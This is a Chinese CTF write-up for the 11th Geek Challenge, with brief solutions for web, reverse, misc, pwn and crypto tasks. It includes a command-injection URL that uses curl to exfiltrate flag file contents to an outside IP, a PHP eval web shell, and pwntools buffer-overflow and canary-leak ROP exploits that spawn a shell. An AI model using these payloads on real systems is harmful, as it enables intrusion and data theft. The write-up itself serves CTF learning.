第11届极客大挑战writeup
2024-04-07 05:03:37
第11届极客大挑战writeup
- Web
- 朋友的学妹
- EZwww
- 刘壮的黑页
- Welcome
- EZgit
- 我是大黑客
- ezbypass
- 知X堂的php教程
- Re
- No RE no gain
- 我真不会写驱动!
- WhatsApk
- HelloAndroid
- re00
- maze
- Hello .NET
- Misc
- 一“页”障目
- 壮言壮语
- 秘技·反复横跳
- 来拼图
- Pwn
- 数学咋样?
- runcode
- liuzhuang-secret
- baby_canary
- Crypto
- 二战情报员刘壮
- 铠甲与萨满
- 成都养猪二厂
- 规规矩矩的工作
- babyRSA
- 韡髻猊岈
- 跳跃的指尖
- childRSA
Web
朋友的学妹
F12,注释,base64解码
EZwww
url最后加www.zip拿到源码
<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{//this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>
POST传参a=sycl0ver
刘壮的黑页
<?php
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {echo $flag;
}
?>
get传username=admin,POST传passwd=syclover
Welcome
burpsuite抓包把GET改成POST
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {header("HTTP/1.1 405 Method Not Allowed");
exit();
} else {if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){show_source(__FILE__);}else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){phpinfo(); // collect information from phpinfo!}
}
POST传roam1[]=1&roam2[]=2,拿到phpinfo
url后面加f1444aagggg.php用burpsuite抓包send to repeater再send
EZgit
用githacker
python GitHacker.py http://47.100.46.169:3902/.git/
我是大黑客
url最后加liuzhuang.php.bak
<?php
eval($_POST['liuzhuang']);//谁是大恶人 那必定是我liuzhuang
//当你的服务器看到 0xliuzhuang 就知道要买台新机器了
?>
蚁剑连接
在根目录找到了flag
ezbypass
GET传a[]=1&b=1
POST传c=123a
知X堂的php教程
47.94.239.194:8082/listdir.php?dirname=JN;curl 175.24.81.163:14444 -d `find / -name flag`
47.94.239.194:8082/listdir.php?dirname=JN;curl 175.24.81.163:14444 -d `cat /flagggggggggggggg_1s_here/flag`
Re
No RE no gain
我真不会写驱动!
WhatsApk
拖进JEB,在Resources文件夹的values文件夹的strings.xml文件里找到了flag
HelloAndroid
拖进JEB,在字符串界面搜索SYC即得flag
re00
导出byte_4060数组
a = [23, 29, 7, 63, 55, 45, 41, 52, 40, 33, 27, 55, 45, 41, 52, 40, 33, 27, 60, 43, 54, 54, 54, 27, 54, 45, 35, 44, 48, 123, 123, 57]
for i in a:print(chr(i^0x44),end='')
maze
Hello .NET
// WpfAppCS.MainWindow
using System.Collections.Generic;
using System.Windows;
using System.Windows.Media;private void Check(object sender, RoutedEventArgs e)
{string text = InputBox.Text;List<int> list = new List<int>();int[] array = new int[22]{18,14,40,-14,-2,30,10,42,35,48,43,49,52,72,57,68,86,145,115,128,115,86};int num = 99;while (list.Count < text.Length){bool flag = true;for (int i = 3; i < num; i += 2){if (num % i == 0){flag = false;break;}}if (flag){list.Add(num);}num += 2;}bool flag2 = true;for (num = 0; num < text.Length && num < array.Length; num++){if (list[num] - text[num] != array[num]){flag2 = false;break;}}if (text.Length == array.Length && flag2){Status.Foreground = new SolidColorBrush(Colors.Green);Status.Text = "Flag is corrent";}else{Status.Foreground = new SolidColorBrush(Colors.Red);Status.Text = "Flag is incorrent";}
}Misc
一“页”障目
宣传单两个字符串拼起来
壮言壮语
与佛论禅
秘技·反复横跳
foremost之后手动恢复二维码
来拼图
把有部分flag的图片拿出来拼在一起
Pwn
数学咋样?
from pwn import *
context.log_level = 'debug'
p = remote("81.69.0.47",1111)
p.recvuntil("I have 20 tests")
for i in range(20):p.recvuntil("!["+str(i)+"] ")temp = p.recvline()num_1 = int(temp[temp.find("num_1 = ")+8:temp.find("num_2 = ")-2],10)num_2 = int(temp[temp.find("num_2 = ")+8:])p.sendline(str(num_1+num_2))
p.recvall()
runcode
#include<stdio.h>
int a=0;
char b,c[100];
int main()
{FILE *fp1 = fopen("/home/ctf/flag","r");fgets(c,100,fp1);puts(c);fgets(c,100,fp1);puts(c);fgets(c,100,fp1);puts(c);fclose(fp1);return 0;
}
liuzhuang-secret
from pwn import *
context.log_level = 'debug'
p = remote("81.69.0.47",1000)
payload = 'a'*0x78 + p64(0x40079B)
p.sendlineafter("My house is quite big, Do you want to play with me?",payload)
p.interactive()
baby_canary
from pwn import *
context.log_level = "debug"
local = 0
if local == 1:r=process('./baby_canary')gdb.attach(r,'b * 0x0400789')
else:r=remote('81.69.0.47',3333)
elf = ELF('./baby_canary')
rdi = 0x400873
system = elf.symbols['system']
binsh = elf.search('/bin/sh').next()
r.sendline(cyclic(0x68))
r.recvuntil('zaab')
canary = u64(r.recv(8))-0xa
print hex(canary)
print hex(u64(r.recv(6)+'\x00\x00'))
r.sendline(cyclic(0x68)+p64(canary)+p64(0xdeadbeef)+p64(rdi)+p64(binsh)+p64(system))
r.interactive()
Crypto
二战情报员刘壮
摩斯密码
铠甲与萨满
凯撒密码
成都养猪二厂
猪圈密码+栅栏密码
规规矩矩的工作
希尔密码,把key的矩阵求逆矩阵再和三个数组成的向量相乘,得到三个数对应三个字母
babyRSA
from Crypto.Util.number import *
from gmpy2 import *
from secret import p,flag
flag = bytes_to_long(bytes(flag,encoding='utf-8'))
q = getPrime(1024)
n = q*p
phi_ = (p-1)*(q-1)
e = 0x10001
d = invert(e,phi_)
c = (pow(flag, e, n))print(long_to_bytes(pow(c, d, n)))
print((c,q,n))
'''out put
(177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194, 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043, 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149)
'''import gmpy2
import libnum
c = 177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194
e = 65537
q = 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043
n = 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149
p = n // q
d = gmpy2.invert(e, (p-1)*(q-1))
m = pow(c, d, n)
print(libnum.n2s(m))
韡髻猊岈
https://www.guballa.de/vigenere-solver
跳跃的指尖
键盘几个字母包住的字母
childRSA
低加密指数广播攻击
from struct import *
from gmpy2 import *
def my_parse_number(number):string = "%x" % number#if len(string) != 64:# return ""erg = []while string != '':erg = erg + [chr(int(string[:2], 16))]string = string[2:]return ''.join(erg)
def extended_gcd(a, b):x,y = 0, 1lastx, lasty = 1, 0while b:a, (q, b) = b, divmod(a,b)x, lastx = lastx-q*x, xy, lasty = lasty-q*y, yreturn (lastx, lasty, a)
def chinese_remainder_theorem(items):N = 1for a, n in items:N *= nresult = 0for a, n in items:m = N//nr, s, d = extended_gcd(n, m)if d != 1:N=N/ncontinue#raise "Input not pairwise co-prime"result += a*s*mreturn result % N, N
sessions=[{"c": 0xff24bddc5a7b327535af92dba58c5d62a22d542e6ba1df6f91c98c7563d8e48e770fb623bfcc2f09ed49788293306ff709670b225da32ea134422d5e403b11c39ef6b144f96b2fe94b3aa136432ecea86a4069a4cb0b4d8570edb3fb5bb2cf0693184ef0c589887b012ebe6ea94e854a71a7eb768133d15e784e388976877db, "e": 3, "n": 0xe096219878f492bcdb2a2d03995521e7a65125733bae18e7d0005e35343fea3653698de60231d29b2d1b44a0b4ffd3183855b9042275f769e1702fa8843062df0938821db0258af40ab3cda8e54eb6ac826d545df91dfe76266cb01b1d6fad39e6ef13ce730c1c2395136b0bbdf22c6b0daba63701d71c6ae70d4e06935b9941},
{"c": 0x895f8283e2200bab1bf938ce3b5e42147b53a5178e436ea0b64a2380ba99776d5ba8046ef722858b20d9650ee68c09e905030f1634e0b32397b7b12236a5a301e5923a294ef1bdf16458f4fc8677370ce2ce3d0fd957da7466e5b104191d454455917147f3187b758c1c468db1b35514391e5b36bd1ac39e91bbb24fdbc07872, "e": 3, "n": 0xa36b15a395edf3e99927f658e22d5f4aefd83434972c96cca5242a1aaa517ad83739451269723092dd9e73c00682dd3bbd74a985546def88196119b6d57b397283bc7b8b6029916df84284bec1725f6e5d3d29042af685c508a58ab6fb4e5bfeb326ae49330e3f4426abc1860ca4412feb976ee571075a47b854c9a6f5f0ebff},
{"c": 0x3bead3d6760bff4de22562978d4722bb21ee4792ebdb32703b6df9ff5176e033e97ad8fc81467f4b3df7bd4e8bcae09462f3eca93a3da1cd9d7e8de3e464471fdd0b70112c1c738b0daa2a37a65331eaa8954b81b410f62a0280da32eb3e305782d5f774d814ca0adb13344687387cf72657dc21724bcf69da810d7635b99467, "e": 3, "n": 0x9d4732db2539d1166dc6865670be11951bf49295bc8c472f34682a0fb7f2b3ba96dcfa1945c2e4685dfeae5255abe2ab3b7fb2282971bb16ce02d14082f71755e8a65c956e114336914a409a9f1158fb362a92c4e169fa3c460ea26fb5c6693447b14f1c3156a2d9308dd993d7ea708a00ad149fb77109d8a5f77de1703ba249}]
data = []
for session in sessions:e=session['e']n=session['n']msg=session['c']data = data + [(msg, n)]
print("Please wait, performing CRT")
x, n = chinese_remainder_theorem(data)
e=session['e']
realnum = iroot(mpz(x),e)[0].digits()
print(my_parse_number(int(realnum)))
第11届极客大挑战writeup相关推荐
- 第十届极客大挑战——部分web和RE的WP
第十届极客大挑战--部分web和RE的WP 昨天刚刚搞完湖湘杯和软考,累的一批,,,,湖湘杯的wp就不写了,写写这个wp 这个好像是一个月之前就开始的,打了一个月,不断的放题,题也做了不少,,, 其他 ...
- 第十届极客大挑战——复现未解决的web和RE
第十届极客大挑战--复现未解决的web和RE emmmm,有些题目是没做出来的,有机会复现,还有官方wp,所以看看,再记录一下 web - 性感黄阿姨,在线聊天 这道题我是真的服了,爆破name,,, ...
- Syc 2019第10届极客大挑战wp
1.打比赛前先撸一只猫! F12查看元素:简单的传参令?cat=dog即出flag 2.你看见过我的菜刀么 打开页面eval($_POST["Syc"]);搬出菜刀连接找到flag ...
- 2020年极客大挑战WEB部分WP
WriteUP Welcome 题目地址: http://49.234.224.119:8000/ 题目描述: 欢迎来到极客大挑战! 访问题目链接,发现405报错. 百度了一下,发现是GET或者POS ...
- 极客大挑战2020wp
目录 Crypto 1. 二战情报员刘壮 2. 铠甲与萨满 3. 跳跃的指尖 5. 成都养猪二厂 5. 规规矩矩的工作 6. Simple calculation 7. babyRSA 8. 韡髻猊岈 ...
- 【reverse】2021 极客大挑战(部分)
[reverse]2021 极客大挑战(部分) 1.调试 0x1 什么?得安装linux虚拟机?像我这种直接用ubuntu系统的根本不虚! 0x2 尝试直接运行,未果 拖入ida中分析,先看main ...
- 【pwn】2022 极客大挑战
[pwn]2022 极客大挑战 前言 又是一年的极客大挑战,又老了一岁,也只有打打新生赛才能有第一次接触ctf快乐了,现在各种比赛的pwn都是纯纯的坐牢~ 本次题解的所有脚本使用的类库都是本人自己整合 ...
- 2011年成都信息工程学院第二季极客大挑战逆向第三题Game破文
[文章标题]: 2011年成都信息工程学院第二季极客大挑战逆向第三题Game破文 [文章作者]: JoyChou [软件名称]: Game [软件大小]: 176KB [下载地址]: http://w ...
- 2011年成都信息工程学院第二季极客大挑战逆向第二题Crackwho破文
[文章标题]: CUIT极客大挑战Crackwho破文 [软件名称]: Crackwho [软件大小]: 36.5KB [下载地址]: http://www.kuaipan.cn/file/id_32 ...
最新文章
- 销售订单行项目的装运点字段确认规则
- 《软件需求》读后感03
- css媒体查询(手机、平板、PC)
- 产品经理需要向上思考
- 信息学奥赛C++语言: 不与最大数相同的数字之和
- ArcSDE10.1配置Oracle 监听器来使用SQL操作ST_Geometry(个人改动版)
- 玩转SpringSession,重要知识点全面剖析(续篇)
- python零基础入门五小时教学_五小时轻松入门Python
- 用计算机软件绘制思维导图和手绘思维导图,手绘思维导图与计算机思维导图的对比...
- 实现WebSocket和WAMP协议的开源库WampSharp
- IAR MCS-51 v7.51A 软件注册机下载
- 解决:如何利用ssh命令,免密登录远程服务器
- 建筑力学与结构【9】
- android 一个app启动另一个App的几种方法
- Windows双开或者多开微信的简单做法
- 使用xshell登陆腾讯云主机
- [论文解读]Going out on a limb: Joint Extraction of Entity Mentions and Relations without...
- 【运用flex制作携程界面练习笔记】
- 基于 PIR 的运动检测:传感器解决方案
- 圣诞节计算机老师贺卡祝福语,给老师的圣诞节贺卡祝福语